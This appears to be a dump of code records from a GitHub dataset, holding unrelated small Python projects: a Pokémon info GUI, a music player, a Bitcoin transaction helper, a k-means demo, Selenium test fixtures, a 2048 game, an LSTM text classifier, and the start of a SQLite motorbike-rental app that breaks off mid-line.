user\n poke_name = ent_name.get().strip()\n if len(poke_name) == 0:\n return\n\n # get poke info from poke api\n poke_info = search_for_pokemon(poke_name)\n if poke_info is None:\n err_msg = f'unable to fetch information for {poke_name.capitalize()} from the PokeAPI.'\n messagebox.showinfo(title='Error', message=err_msg, icon='error')\n if poke_info is not None:\n type_list = [t['type']['name'] for t in poke_info['types']]\n poke_type = ', '.join(type_list).title()\n # Populate the info frame\n lbl_height_value['text'] = f\"{poke_info['height']} dm \"\n lbl_weight_value['text'] = f\"{poke_info['weight']} hg\"\n lbl_type_value['text'] = poke_type\n\n # Populate the stats frame\n bar_hp['value'] = poke_info['stats'][0]['base_stat']\n bar_attack['value'] = poke_info['stats'][1]['base_stat']\n bar_defense['value'] = poke_info['stats'][2]['base_stat']\n bar_spec_atk['value'] = poke_info['stats'][3]['base_stat']\n bar_spec_def['value'] = poke_info['stats'][4]['base_stat']\n bar_speed['value'] = poke_info['stats'][5]['base_stat']\n\n# Create Get info button\nbtn_get_info = ttk.Button(frm_top, text='Get Info', command=handle_get_info)\nbtn_get_info.grid(row=0, column=2, padx=10, pady=10)\n\n#loop until window is closed\nroot.mainloop()","repo_name":"Deryaus/COMP-593-Lab9","sub_path":"lab9.py","file_name":"lab9.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"12239639294","text":"from threading import Thread\nimport time \n# import datetime\nfrom mutagen.mp3 import MP3\nfrom pygame import mixer\n# import threading\nimport os \n\n\n#flag \npaused = 1\nvolume = 0.7\nkill_all = 0\nplay_time =0 \nsleep_timer = 0\n\nmusic_dir = f'{os.getcwd()}/musics/'\nmusic_list =sorted([x for x in os.listdir(music_dir) if x.split('.')[1]=='mp3'])\nprint(music_list)\nmusic_count = 0\ntotal_music = len(music_list)\n\n\n\n\n# Starting the mixer\n\n# Start playing the song\n\ndef play_for_once(path):\n mixer.init(22050)\n\n # Setting the volume\n mixer.music.set_volume(volume)\n mixer.music.load(path)\n mixer.music.play()\n time.sleep(MP3(path).info.length)\n # time.sleep(3)\n mixer.music.unload()\n mixer.stop()\n mixer.quit()\n # print('once fucntion done')\n\n\ndef play_maintain(mixer,count:int,step:int,total_music:int,music_list:list,music_dir:str):\n count = (count+step) % total_music\n mixer.music.stop()\n mixer.music.unload()\n mixer.music.load(music_dir+music_list[count])\n mixer.music.play()\n\n global sleep_timer\n global music_count\n global play_time \n\n sleep_timer = MP3(music_dir+music_list[count]).info.length\n music_count = count\n play_time = 0 \n return count\n\n\n\n\n\n\nclass MusicControl(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.daemon = True\n # self._stop_event = threading.Event()\n self.start()\n\n def run(self):\n print('thread started')\n mixer.init(22050)\n\n # Setting the volume\n \n global sleep_timer\n global paused \n global volume\n global music_count\n # Loading the song\n mixer.music.set_volume(volume)\n mixer.music.load(music_dir + music_list[music_count])\n sleep_timer = MP3(music_dir+music_list[music_count]).info.length\n \n mixer.music.play()\n paused = 0 \n\n\n while True:\t\n print('''m -> change menu \np -> play or pause\n> -> next song\n< -> prevous song\n+ -> volume up\n- -> volume down''')\n\n query = input(\" \")\n if query == 'p':\n # Pausing the music\n if not paused:\n mixer.music.pause()\t\n paused = 1\n # Resuming the music\n else:\n mixer.music.unpause()\n paused = 0 \n\n elif query == 'm':\n # Stop the mixer\n mixer.music.stop()\n mixer.quit()\n global kill_all \n kill_all = 1\n # mixer.quit()\n break\n \n elif query == '>':\n \n play_maintain(mixer,music_count,1,total_music,music_list,music_dir)\n\n elif query == \"<\":\n\n play_maintain(mixer,music_count,-1,total_music,music_list,music_dir)\n\n elif query == '+' :\n volume += .1\n mixer.music.set_volume(volume)\n elif query == '-' :\n volume -= 0.1\n mixer.music.set_volume(volume)\n \n \n\n\n\n\nclass MusicEnd(Thread):\n def __init__(self):\n Thread.__init__(self)\n self.daemon = True\n # self._stop_event = threading.Event()\n self.start()\n def run(self):\n global sleep_timer\n global paused\n global play_time\n global kill_all\n # print(x,sleep_timer)\n while True:\n \n if not paused: play_time +=1\n # else: print('paused')\n if play_time > sleep_timer-1: \n # print(x,sleep_timer)\n # print('next')\n global music_count\n music_count = play_maintain(mixer,music_count,1,total_music,music_list,music_dir)\n play_time = 0\n time.sleep(2)\n time.sleep(1)\n if kill_all:\n break\n\n\n\n\n\n\nif __name__ == '__main__':\n\n MusicControl()\n time.sleep(.5)\n MusicEnd()\n while True:\n if kill_all:\n break \n pass\n","repo_name":"ahsankoushik/cane","sub_path":"music/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"25134703055","text":"import typing\n\nfrom btcbargain import exceptions\nfrom btcbargain.input import BargainInput\nfrom btcbargain.output import BargainOutput\nfrom btcbargain.transaction import BargainTransaction\n\n\nOUTPUT_SIZE = 23\n\n\nclass BargainSealer:\n def __init__(\n self,\n *tx_inputs: BargainInput,\n output: typing.Optional[BargainOutput] = None,\n recipient_address=None\n ):\n self.tx_inputs = [x for x in tx_inputs]\n self.output = output\n self.recipient_address = recipient_address\n\n def add_recipient_address(self, address: str):\n self.recipient_address = address\n return self\n\n def add_signature_to_input(self, input_index: int, signature: str):\n self.tx_inputs[input_index].add_signature(signature)\n return self\n\n def to_json(self) -> typing.Dict:\n return {\n 'inputs': [i.to_json() for i in self.tx_inputs],\n 'output': self.output and self.output.to_json(),\n 'recipient_address': self.recipient_address\n }\n\n @property\n def signatures(self) -> typing.Dict:\n res = {}\n for i in self.tx_inputs:\n if i.signature:\n res[i.outpoint_hash + ':{}'.format(i.outpoint_index)] = i.signature\n return res\n\n def mount_transaction(self, transaction: BargainTransaction) -> 'BargainSealer':\n if not self.recipient_address:\n raise exceptions.MissingSealerRecipient\n gathering_amount = 0\n for participant in transaction.participants:\n gathering_amount += participant.paying_amount\n for i in participant.tx_inputs:\n self.tx_inputs.append(i.clone())\n transaction.sealer = self\n self._add_gathering_output(gathering_amount)\n return self\n\n def _add_gathering_output(self, amount: int):\n self.output = BargainOutput(self.recipient_address, amount, OUTPUT_SIZE)\n","repo_name":"gdassori/btc-bargain","sub_path":"btcbargain/sealer.py","file_name":"sealer.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"31416603737","text":"#!/usr/bin/python3\n\"\"\"\n\n This module has one function to print a square\n\n\"\"\"\n\n\ndef print_square(size):\n \"\"\"\n\n This function prints a square of size size\n\n Args:\n size: an int\n\n Raises:\n TypeError: if size is not an int\n ValueError: if size is less than 0\n\n \"\"\"\n if not isinstance(size, int):\n raise TypeError('size must be an integer')\n if size < 0:\n raise ValueError('size must be >= 0')\n for i in range(size):\n print('#' * size)\n","repo_name":"HusamDin/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/4-print_square.py","file_name":"4-print_square.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"23447949395","text":"from random import random, randint #imports random\n\nnumber_list = [\"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"15\"] #card name list\ncard_type_list = [\"clubs\", \"dimonds\", \"hearts\", \"spades\", \"joker\"] #card type list\n\nworkout_clubs = [\"crunches\", \"laying leg raises\", \"russian twist\"] #ab exersizes\nworkout_dimonds = [\"squats\", \"forward lunges\", \"jump squats\", \"side lunges\", \"calf raises\"] #leg exersizes\nworkout_hearts = [\"pushups\", \"dips\"] #chest exersizes\nworkout_spades = [\"jumping jacks\"] #cardio exersizes\nworkout_joker = [\"1 min wall sit\", \"1 min plank\"] #endurance exersizes\n\n\nx = randint(0,12)\ny = randint(0,3)\n\n\nw = randint(0,2)\ni = randint(0,4)\nu = randint(0,1)\nz = 0\njoker = randint(0,1)\n\n\nif card_type_list[y] == \"clubs\":\n print(number_list[x], workout_clubs[w])\nelif card_type_list[y] == \"dimonds\":\n print(number_list[x], workout_dimonds[i])\nelif card_type_list[y] == \"hearts\":\n print(number_list[x], workout_hearts[u])\nelif card_type_list[y] == \"spades\":\n print(number_list[x], workout_spades[z])\nelse:\n print(workout_joker[joker])\n\n\n\n\n\n","repo_name":"PatrickBeilman/card_workout","sub_path":"card_workout.py","file_name":"card_workout.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"7610041696","text":"from math import sqrt\nfrom matplotlib import pyplot as plt\nfrom sklearn.datasets import make_blobs\nfrom sklearn.cluster import KMeans\n\n\"\"\"## Criando dataset\"\"\"\n\nX, y = make_blobs(n_samples=500, centers=20, random_state=999)\nplt.scatter(X[:,0], X[:,1])\n\n\"\"\"## Função para calcular o melhor número de cluster através das distancias entre pontos\"\"\"\n\ndef optimal_number_of_clusters(wcss):\n x1, y1 = 1, wcss[0]\n x2, y2 = 19, wcss[len(wcss)-1]\n distances = []\n for i in range(len(wcss)):\n x0 = i + 1\n y0 = wcss[i]\n numerator = abs((y2-y1)*x0 - (x2-x1)*y0 + x2*y1 - y2*x1)\n denominator = sqrt((y2 - y1)**2 + (x2 - x1)**2)\n distances.append(numerator/denominator)\n \n return distances.index(max(distances)) + 1\n\n\"\"\"## Cria uma lista de distâncias e calcula o número de cluster ideal\"\"\"\n\nwcss = []\nfor i in range(1, 20):\n kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=300, n_init=10)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\nn = optimal_number_of_clusters(wcss)\nprint(f'Number of optimal cluster is {n}')\n\n\"\"\"## Plot a curva de distâncias para visualizar o melhor número de cluster.\n## Fica no \"joelho\" da curva o número ideal\n\"\"\"\n\nwcss = []\nfor i in range(1, 20):\n kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=300, n_init=10)\n kmeans.fit(X)\n wcss.append(kmeans.inertia_)\nplt.plot(range(1, 20), wcss)\nplt.plot([1, 19],[wcss[0], wcss[len(wcss)-1]])\nplt.title('Elbow Method')\nplt.xlabel('Number of clusters')\nplt.ylabel('WCSS')\nplt.grid()\nplt.show()\n\n\"\"\"## Plota o clusters criados de acordo com o K-means\"\"\"\n\nkmeans = KMeans(n_clusters=5, init='k-means++', max_iter=300, n_init=10)\npred_y = kmeans.fit_predict(X)\nplt.scatter(X[:,0], X[:,1], c=pred_y)\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s=200, c='red')\nprint(kmeans.cluster_centers_) #coordinates of centroid\nprint(kmeans.inertia_) #soma dos quadrados intra-clusters\nplt.show()","repo_name":"raffoliveira/Bootcamp-Data-Scientist","sub_path":"Module_1 - Fundamentos/Trabalho/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"20684714066","text":"from zip_ll import __version__\nfrom zip_ll.zip_ll import LinkedList\n\n\ndef test_version():\n assert __version__ == '0.1.0'\n\n################################## both of them are not empty #######################################\ndef test_twoll():\n llist1 = LinkedList()\n llist2 = LinkedList()\n llist1.insert(1) \n llist1.insert(2)\n llist1.insert(3) \n llist2.insert(6)\n llist2.insert(7)\n llist2.insert(8)\n llist1.zip(p=llist1, q=llist2)\n actual = llist1.__str__()\n expected = '( 3 ) -> ( 8 ) -> ( 2 ) -> ( 7 ) -> ( 1 ) -> ( 6 ) -> None'\n assert actual == expected\n############################ one of them is empty ############################################\ndef test_twoll_one_empty():\n llist1 = LinkedList()\n llist2 = LinkedList()\n llist1.insert(1)\n llist1.insert(2)\n llist1.insert(3)\n llist1.insert(4)\n llist1.zip(p=llist1, q=llist2)\n actual = llist1.__str__()\n expected = '( 4 ) -> ( 3 ) -> ( 2 ) -> ( 1 ) -> None'\n assert actual == expected\n################################## two of them are empty ###########################################\ndef test_twoll_two_empty():\n llist1 = LinkedList()\n llist2 = LinkedList()\n llist1.zip(p=llist1, q=llist2)\n actual = llist1.__str__()\n expected = ''\n assert actual == expected\n#################################################################################################\n","repo_name":"Talafhamohammad-cloud/data-structures-and-algorithms-python","sub_path":"challenges/ch-08-zipll/zip-ll/zip-ll/tests/test_zip_ll.py","file_name":"test_zip_ll.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30093360371","text":"import pandas as pd\nimport numpy as np\nimport time\n\n\n# parameters:\ndata_folder = \"data\"\nnrows = None\nstart_time = time.time()\n\nprior_order_details = pd.read_pickle(\n \"{}/prior_order_details.pickle\".format(data_folder)\n)\n\nproduct_1_temp = prior_order_details.groupby([\"product_id\"]).agg(\n {\n \"order_id\": [\"nunique\"],\n \"user_id\": [\"nunique\"],\n \"add_to_cart_order\": [\"mean\", \"std\"],\n \"reordered\": [\"mean\", \"sum\"],\n \"_up_purchase_order\": lambda x: np.sum(x == 2),\n }\n)\n\nproduct_1_temp.columns = (\n product_1_temp.columns.get_level_values(0)\n + \"_\"\n + product_1_temp.columns.get_level_values(1)\n)\nproduct_1 = product_1_temp.rename(\n columns={\n \"order_id_nunique\": \"p_num_purchases\",\n \"user_id_nunique\": \"p_unique_buyers\",\n \"add_to_cart_order_mean\": \"p_mean_add_cart_num\",\n \"add_to_cart_order_std\": \"p_std_add_cart_num\",\n \"reordered_mean\": \"p_reorder_rate\",\n \"reordered_sum\": \"p_sum_reordered\",\n \"_up_purchase_order_\": \"p_sum_secondtime_purchase\",\n }\n)\nproduct_1.reset_index(inplace=True)\n\nproduct_1[\"p_ratio_2nd_to_onetime_purchases\"] = (\n product_1[\"p_sum_secondtime_purchase\"] / product_1[\"p_unique_buyers\"]\n)\n\n# fist order and first reorder\nfirst_order = (\n prior_order_details.loc[prior_order_details[\"reordered\"] == 0]\n .groupby([\"product_id\", \"user_id\"])\n .agg({\"order_number\": \"min\"})\n)\nfirst_reorder = (\n prior_order_details.loc[prior_order_details[\"reordered\"] == 1]\n .groupby([\"product_id\", \"user_id\"])\n .agg({\"order_number\": \"min\"})\n)\n\nfirst_reorder_diff = (first_reorder - first_order).reset_index()\nfirst_reorder_diff = first_reorder_diff.groupby(\"product_id\").agg(\n {\"order_number\": [\"mean\", \"std\"]}\n)\nfirst_reorder_diff.columns = (\n first_reorder_diff.columns.get_level_values(0)\n + \"_\"\n + first_reorder_diff.columns.get_level_values(1)\n)\n\nfirst_reorder_diff = first_reorder_diff.rename(\n columns={\n \"order_number_mean\": \"p_avg_first_reorder_diff\",\n \"order_number_std\": \"p_std_first_reorder_diff\",\n }\n).reset_index()\n\n\np_first_order = (\n first_order.reset_index()\n .groupby(\"product_id\")\n .agg({\"order_number\": [\"mean\", \"std\"]})\n)\n\np_first_order.columns = (\n p_first_order.columns.get_level_values(0)\n + \"_\"\n + p_first_order.columns.get_level_values(1)\n)\n\np_first_order = p_first_order.rename(\n columns={\n \"order_number_mean\": \"p_avg_first_order_num\",\n \"order_number_std\": \"p_std_first_order_num\",\n }\n).reset_index()\n\n\np_first_reorder = (\n first_reorder.reset_index()\n .groupby(\"product_id\")\n .agg({\"order_number\": [\"mean\", \"std\"]})\n)\n\np_first_reorder.columns = (\n p_first_reorder.columns.get_level_values(0)\n + \"_\"\n + p_first_reorder.columns.get_level_values(1)\n)\n\np_first_reorder = p_first_reorder.rename(\n columns={\n \"order_number_mean\": \"p_avg_first_reorder_num\",\n \"order_number_std\": \"p_std_first_reorder_num\",\n }\n).reset_index()\n\nproduct_features = (\n product_1.merge(p_first_order, how=\"left\")\n .merge(p_first_reorder, how=\"left\")\n .merge(first_reorder_diff, how=\"left\")\n)\n\n# For products that were only ordered once or have never been re-ordered,\n# their std or average features are calculated as null, replace them with 0\nproduct_features.fillna(0, inplace=True)\n\nproduct_features.to_pickle(\"{}/product_features_basic_agg.pickle\".format(data_folder))\n\nend_time = time.time()\ntime_spent = (end_time - start_time) / 60\nprint(\"spent {:.2f} mins\".format(time_spent))\n","repo_name":"goqiao/Instacart-Market-Basket-Analysis","sub_path":"201_product_basic.py","file_name":"201_product_basic.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"42560652347","text":"import os.path\nimport shutil\nimport sys\nimport pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\nfrom _pytest.fixtures import FixtureRequest\n\nimport data\nfrom ui.pages.base_page import BasePage\nfrom ui.pages.dashboard_page import DashboardPage\nfrom ui.pages.login_page import LoginPage\nfrom ui.pages.campaign_page import CampaignPage\nfrom ui.pages.segments_page import (\n SegmentsPage,\n SegmentsListPage,\n SegmentsListNewPage,\n)\nfrom generators.value_generator import (\n DataAuth,\n DataCampaign,\n DataSegments,\n)\n\n\ndef pytest_configure(config):\n if sys.platform.startswith('win'):\n base_dir = r'C:\\tests'\n else:\n base_dir = '/tmp/tests'\n if not hasattr(config, 'workerunput'):\n if os.path.exists(base_dir):\n shutil.rmtree(base_dir)\n os.makedirs(base_dir)\n\n config.base_temp_dir = base_dir\n\n\n@pytest.fixture()\ndef driver(config, temp_dir):\n browser = config['browser']\n url = config['url']\n selenoid = config['selenoid']\n vnc = config['vnc']\n options = Options()\n options.add_experimental_option(\"prefs\", {\"download.default_directory\": temp_dir})\n if selenoid:\n capabilities = {\n \"browserName\": \"chrome\",\n 'version': '98.0',\n }\n if vnc:\n capabilities['enableVNC'] = True\n driver = webdriver.Remote(\n 'http://127.0.0.1:4444/wd/hub',\n options=options,\n desired_capabilities=capabilities,\n )\n elif browser == 'chrome':\n driver = webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=options)\n elif browser == 'firefox':\n driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n else:\n raise RuntimeError(f'Unsupported browser: \"{browser}\"')\n driver.get(url)\n driver.maximize_window()\n yield driver\n driver.quit()\n\n\n@pytest.fixture\ndef base_page(driver):\n return BasePage(driver=driver)\n\n\n@pytest.fixture\ndef dashboard_page(driver):\n return DashboardPage(driver=driver)\n\n\n@pytest.fixture\ndef login_page(driver):\n return LoginPage(driver=driver)\n\n\n@pytest.fixture\ndef campaign_page(driver):\n return CampaignPage(driver=driver)\n\n\n@pytest.fixture\ndef segments_page(driver):\n return SegmentsPage(driver=driver)\n\n\n@pytest.fixture\ndef segments_list_page(driver):\n return SegmentsListPage(driver=driver)\n\n\n@pytest.fixture\ndef segments_list_new_page(driver):\n return SegmentsListNewPage(driver=driver)\n\n\ndef get_driver(brower_name):\n if brower_name == 'chrome':\n browser = webdriver.Chrome(executable_path=ChromeDriverManager(\n ).install())\n elif brower_name == 'firefox':\n browser = webdriver.Firefox(executable_path=GeckoDriverManager(\n ).install())\n else:\n raise RuntimeError(f'Unsupported browser: \"{brower_name}\"')\n browser.maximize_window()\n\n return browser\n\n\n@pytest.fixture(scope='session', params=['chrome', 'firefox'])\ndef all_drivers(config, request):\n url = config['url']\n browser = get_driver(request.param)\n browser.get(url)\n yield browser\n browser.quit()\n\n\n@pytest.fixture(scope='session')\ndef credentials():\n user = data.VALID_LOGIN\n password = data.VALID_PASSWORD\n return user, password\n\n\n@pytest.fixture(scope='function')\ndef fake_credentials():\n generator = DataAuth()\n data_auth = generator.build()\n return data_auth\n\n\n@pytest.fixture(scope='session')\ndef data_campaign():\n generator = DataCampaign()\n return generator.build()\n\n\n@pytest.fixture(scope='session')\ndef data_segments():\n generator = DataSegments()\n return generator.build()\n\n\n@pytest.fixture()\ndef file_path(repo_root):\n return os.path.join(repo_root, 'files', 'banner.jpg')\n\n\n@pytest.fixture(scope='session')\ndef cookies(credentials, config):\n driver = get_driver(config['browser'])\n driver.get(config['url'])\n login_page = LoginPage(driver)\n login_page.authorization(*credentials)\n\n cookies = driver.get_cookies()\n driver.quit()\n\n return cookies\n\n\n@pytest.fixture(scope='function')\ndef auth(request: FixtureRequest, driver):\n cookies = request.getfixturevalue('cookies')\n for cookie in cookies:\n driver.add_cookie(cookie)\n driver.refresh()\n\n return DashboardPage(driver=driver)\n","repo_name":"Sobol-EV/2022-1-QAPYTHON-VK-E-Sobol","sub_path":"homework2/ui/fixtures.py","file_name":"fixtures.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"39510022699","text":"#!/usr/bin/env python3\n#\n# Initialize tables\n\nimport database\n\nsql_file_table = [\n '../sql/oqs_record.sql',\n '../sql/user_record.sql',\n]\n\ndef main():\n cnx = database.connect_db()\n cursor = cnx.cursor()\n for i in sql_file_table:\n with open(i) as f:\n sql_words = f.read()\n cursor.execute(sql_words)\n cursor.close()\n cnx.close()\n\nif __name__ == '__main__':\n main()","repo_name":"wych/oqs.me","sub_path":"database/scripts/create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40028315847","text":"from random import choice\nimport numpy as np\nfrom copy import deepcopy\n\nLEFT, UP, RIGHT, DOWN = 0, 1, 2, 3\nRANDOM_TILES = [2, 2, 2, 2, 2, 2, 2, 2, 2, 4]\n\n\nclass Game():\n\n def __init__(self, board=None) -> None:\n self.game_over = False\n if board is None:\n self.reset()\n else:\n self.__board = board\n self.__score = np.int64(0)\n self.__reward_diff = np.int64(0)\n\n def get_board(self) -> np.ndarray:\n return np.copy(self.__board)\n\n def get_score(self) -> np.int64:\n return self.__score\n\n def get_score_diff(self) -> np.int64:\n return self.__reward_diff\n\n def make_move(self, move, spawn_tile=True) -> None:\n tmp_board = np.rot90(self.__board, move)\n tmp_board = self.__stack__(tmp_board)\n tmp_board = self.__merge__(tmp_board)\n tmp_board = self.__stack__(tmp_board)\n tmp_board = np.rot90(tmp_board, 4-move)\n\n if np.array_equal(tmp_board, self.__board):\n self.game_over = True\n else:\n self.__board = tmp_board\n if spawn_tile:\n self.spawn_random_tile()\n\n self.__check_gameover__()\n\n def branch(self) -> dict:\n res = {}\n for move in range(4):\n tmp_board = deepcopy(self)\n tmp_board.make_move(move)\n res[move] = tmp_board\n return res\n\n def branch_all(self, n: int):\n res = []\n idx_empty_tiles = np.argwhere(board == 0)\n for idx in idx_empty_tiles:\n tmp_b = np.copy(board)\n tmp_b[idx[0], idx[1]] = n\n res.append(tmp_b)\n return res\n\n def reset(self) -> None:\n self.game_over = False\n self.__board = np.zeros((4, 4), dtype=np.int32)\n self.spawn_random_tile()\n self.spawn_random_tile()\n\n def spawn_random_tile(self, n=None) -> None:\n empty_tiles = np.argwhere(self.__board == 0)\n number = choice(RANDOM_TILES) if n is None else n\n idy, idx = choice(empty_tiles)\n self.__board[idy, idx] = number\n\n def __stack__(self, board):\n tmp_board = np.zeros_like(board)\n for i in range(4):\n row = board[i]\n row = row[row != 0]\n tmp_board[i, :len(row)] = row\n return tmp_board\n\n def __merge__(self, board, add_score=True):\n tmp_board = np.copy(board)\n if add_score:\n self.__reward_diff = 0\n for i in range(4):\n for j in range(3):\n if tmp_board[i, j] == tmp_board[i, j+1]:\n tmp_board[i, j+1] = 0\n tmp_board[i, j] = 2*tmp_board[i, j]\n if add_score:\n tmp_score = np.int64(tmp_board[i, j])\n self.__reward_diff += tmp_score\n self.__score += tmp_score\n return tmp_board\n\n def __check_gameover__(self):\n for move in range(4):\n tmp_board = np.rot90(self.__board, move)\n tmp_board = self.__stack__(tmp_board)\n tmp_board = self.__merge__(tmp_board, False)\n tmp_board = self.__stack__(tmp_board)\n tmp_board = np.rot90(tmp_board, 4-move)\n if not np.array_equal(tmp_board, self.__board):\n return\n self.game_over = True\n\n\nif __name__ == '__main__':\n bla = np.array([[2, 2, 0, 2], [0, 0, 0, 4], [2, 0, 0, 8], [0, 0, 0, 8]])\n board = Game(bla)\n board.make_move(DOWN)\n print(board.get_score_diff())\n board.make_move(LEFT)\n print(board.get_score_diff())\n print(board.game_over)\n","repo_name":"oswald-martin/zhaw_ai1","sub_path":"P02_2048/martin/py_game.py","file_name":"py_game.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"36870852939","text":"import torch\nimport torch.nn as nn\nfrom torch import tanh\nimport pytorch_lightning as pl\nfrom torch.nn import functional as F\nfrom pytorch_lightning.metrics.functional import accuracy, f1\n\nfrom src.classifier.torch_helpers.regard_classifier import RegardClassifier\n\n\nclass RegardLSTM(RegardClassifier):\n def __init__(\n self,\n n_embed,\n n_hidden,\n n_hidden_lin,\n n_output,\n n_layers,\n lr,\n weight_vector,\n bidirectional,\n gru,\n drop_p,\n drop_p_gru,\n ):\n RegardClassifier.__init__(\n self, n_embed, n_hidden_lin, n_output, lr, weight_vector, drop_p\n )\n drop_p_gru = drop_p_gru if drop_p_gru is not None else 0\n drop_p = drop_p if drop_p is not None else 0\n if gru:\n if n_hidden_lin > 0:\n\n self.lin1 = nn.Linear(n_embed, n_hidden_lin)\n self.dropout = nn.Dropout(drop_p)\n self.lstm = nn.GRU(\n n_hidden_lin,\n n_hidden,\n n_layers,\n batch_first=True,\n dropout=drop_p_gru,\n bidirectional=bidirectional,\n )\n\n else:\n self.lstm = nn.GRU(\n n_embed,\n n_hidden,\n n_layers,\n batch_first=True,\n dropout=drop_p_gru,\n bidirectional=bidirectional,\n )\n else:\n if n_hidden_lin > 0:\n self.lin1 = nn.Linear(n_embed, n_hidden_lin)\n self.lstm = nn.LSTM(\n n_hidden_lin,\n n_hidden,\n n_layers,\n batch_first=True,\n dropout=drop_p_gru,\n bidirectional=bidirectional,\n )\n else:\n self.lstm = nn.LSTM(\n n_embed,\n n_hidden,\n n_layers,\n batch_first=True,\n dropout=drop_p_gru,\n bidirectional=bidirectional,\n )\n self.fc = (\n nn.Linear(n_hidden * 2, n_output)\n if bidirectional\n else nn.Linear(n_hidden, n_output)\n )\n\n def forward(self, input_words):\n # INPUT : (batch_size, seq_length)\n if self.n_hidden_lin > 0:\n lin_out = self.lin1(input_words)\n lin_out = tanh(lin_out)\n lin_out = self.dropout(lin_out)\n lstm_out, h = self.lstm(lin_out) # (batch_size, seq_length, n_hidden)\n else:\n lstm_out, h = self.lstm(input_words)\n fc_out = self.fc(lstm_out) # (batch_size, seq_length, n_output)\n fc_out = fc_out[\n :, -1, :\n ] # take only result of end of a sequence (batch_size, n_output)\n\n return fc_out, h\n","repo_name":"krangelie/bias-in-german-nlg","sub_path":"src/classifier/lstm/lstm_classifier.py","file_name":"lstm_classifier.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"82"} +{"seq_id":"25793228678","text":"import sqlite3\r\nimport os\r\nimport platform\r\nfrom datetime import datetime\r\n\r\nkosongkanCmd = lambda: os.system('cls')\r\nlogin = []\r\n\r\nclass Database:\r\n\tdef __init__(self):\r\n\t\tself.mydb = sqlite3.connect(\"sewaMotor.db\")\r\n\t\tself.mycursor = self.mydb.cursor()\r\n\r\nclass KumpulanQuery(Database):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tDatabase.__init__(self)\r\n\t\tself.query = query\r\n\t\tself.isi = isi\r\n\r\n\tdef masukkanData(self):\r\n\t\tself.mycursor.executemany(self.query, self.isi)\r\n\t\tself.mydb.commit()\r\n\r\n\tdef ambilSemuaData(self):\r\n\t\tself.mycursor.execute(self.query)\r\n\t\treturn self.mycursor.fetchall()\r\n\r\n\tdef ambilSemuaDataSpesifik(self):\r\n\t\tself.mycursor.execute(self.query, self.isi)\r\n\t\treturn self.mycursor.fetchall()\r\n\r\n\tdef ambilSatuData(self):\r\n\t\tself.mycursor.execute(self.query, self.isi)\r\n\t\treturn self.mycursor.fetchone()\r\n\r\n\tdef ubahData(self):\r\n\t\tself.mycursor.execute(self.query, self.isi)\r\n\t\tself.mydb.commit()\r\n\r\n\tdef hapusData(self):\r\n\t\tself.mycursor.execute(self.query, self.isi)\r\n\t\tself.mydb.commit()\r\n\r\nclass Akun(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef prosesLogin(self, username, password):\r\n\t\tself.query = \"SELECT id_akun, username, nama_user, hak_akses FROM tb_akun WHERE username = ? AND password = ?\"\r\n\t\tself.isi = (username, password)\r\n\r\n\t\thasil = self.ambilSatuData()\r\n\r\n\t\tkosongkanCmd()\r\n\r\n\t\tif(hasil):\r\n\t\t\tlogin.append(hasil)\r\n\t\telse:\r\n\t\t\tprint(\"Username atau password salah\")\r\n\r\n\t\treturn hasil\r\n\r\n\tdef registrasi(self, data):\r\n\t\tself.query = \"INSERT INTO tb_akun (username, password, nama_user, no_ktp, alamat, hak_akses) VALUES (?, ?, ?, ?, ?, ?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Berhasil mendaftar. Silahkan login kembali\")\r\n\r\nclass Merk(KumpulanQuery):\r\n\tdef __init__(self, query=None, isi=None):\r\n\t\tKumpulanQuery.__init__(self, query, isi)\r\n\r\n\tdef inputMerk(self, data):\r\n\t\tself.query = \"INSERT INTO tb_merk (nama_merk) VALUES (?)\"\r\n\t\tself.isi = data\r\n\r\n\t\tself.masukkanData()\r\n\t\tprint(\"Data berhasil diinput\")\r\n\r\n\tdef ambilMerk(self):\r\n\t\tself.query = \"SELECT * 